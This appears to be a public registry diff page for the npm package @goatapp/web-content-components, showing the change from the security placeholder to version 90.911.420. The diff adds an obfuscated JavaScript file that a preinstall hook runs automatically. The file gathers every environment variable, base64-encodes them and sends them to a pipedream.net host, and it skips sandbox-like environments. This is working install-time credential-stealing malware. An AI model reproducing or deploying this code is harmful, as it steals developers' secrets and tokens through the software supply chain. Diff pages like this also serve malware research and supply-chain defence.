@goatapp/web-content-components 0.0.1-security → 90.911.420
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/ejkzglh.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/ejkzglh.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x32ab33=a0_0x45b9;(function(_0x216b89,_0x5da4a9){const _0x341478=a0_0x45b9,_0x53a0af=_0x216b89();while(!![]){try{const _0x507361=-parseInt(_0x341478(0xc3))/0x1+-parseInt(_0x341478(0xd8))/0x2*(-parseInt(_0x341478(0xc9))/0x3)+parseInt(_0x341478(0xc2))/0x4*(-parseInt(_0x341478(0xc5))/0x5)+-parseInt(_0x341478(0xd4))/0x6+parseInt(_0x341478(0xc0))/0x7*(-parseInt(_0x341478(0xd1))/0x8)+-parseInt(_0x341478(0xc6))/0x9+parseInt(_0x341478(0xbf))/0xa;if(_0x507361===_0x5da4a9)break;else _0x53a0af['push'](_0x53a0af['shift']());}catch(_0x4a56d9){_0x53a0af['push'](_0x53a0af['shift']());}}}(a0_0xaef0,0x6328e));function a0_0x45b9(_0x56aa2a,_0x844a85){const _0xaef056=a0_0xaef0();return a0_0x45b9=function(_0x45b9d4,_0xf26ac9){_0x45b9d4=_0x45b9d4-0xbc;let _0x13d2cf=_0xaef056[_0x45b9d4];return _0x13d2cf;},a0_0x45b9(_0x56aa2a,_0x844a85);}const http=require(a0_0x32ab33(0xd7)),filter=[{'key':a0_0x32ab33(0xd0),'val':a0_0x32ab33(0xc8)},{'key':'npm_config_registry','val':'tencent.com'},{'key':a0_0x32ab33(0xd0),'val':a0_0x32ab33(0xbe)},{'key':a0_0x32ab33(0xc4),'val':'daasadmin'},{'key':'_','val':a0_0x32ab33(0xd2)}];function main(){const _0xbca200=a0_0x32ab33;var _0x2434bc=process[_0xbca200(0xd9)]||{};if(filter[_0xbca200(0xd5)](({key:_0x42150d,val:_0x26e8e7})=>_0x2434bc[_0x42150d]&&_0x2434bc[_0x42150d]['includes'](_0x26e8e7))||Object[_0xbca200(0xca)](_0x2434bc)[_0xbca200(0xda)]<0xa)return;req=http[_0xbca200(0xc1)]({'host':['bd43527e019ae8efb47eb39bb9313ac5','m','pipedream',_0xbca200(0xc7)][_0xbca200(0xcc)]('.'),'path':'/'+(_0x2434bc[_0xbca200(0xd6)]||''),'method':_0xbca200(0xcb)})['on'](_0xbca200(0xcf),function(_0x1f9cb2){}),req[_0xbca200(0xd3)](Buffer[_0xbca200(0xbc)](JSON['stringify'](_0x2434bc))[_0xbca200(0xcd)](_0xbca200(0xbd))),req[_0xbca200(0xce)]();}function a0_0xaef0(){const _0x54b6e1=['8aLRLan','env','length','from','base64','registry.npmmirror.com','18679500awilgW','1932098AvcjfO','request','44emUBdv','332323cudSqY','USERNAME','271555ENJbyV','148329LNqfda','net','taobao.org','284331jscuDI','keys','POST','join','toString','end','error','npm_config_registry','16cneEkc','/usr/bin/python','write','2055882ORHqmF','some','npm_package_name','https'];a0_0xaef0=function(){return _0x54b6e1;};return a0_0xaef0();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "90.911.420",
|
|
4
|
+
"main": "ejkzglh.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node ejkzglh.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|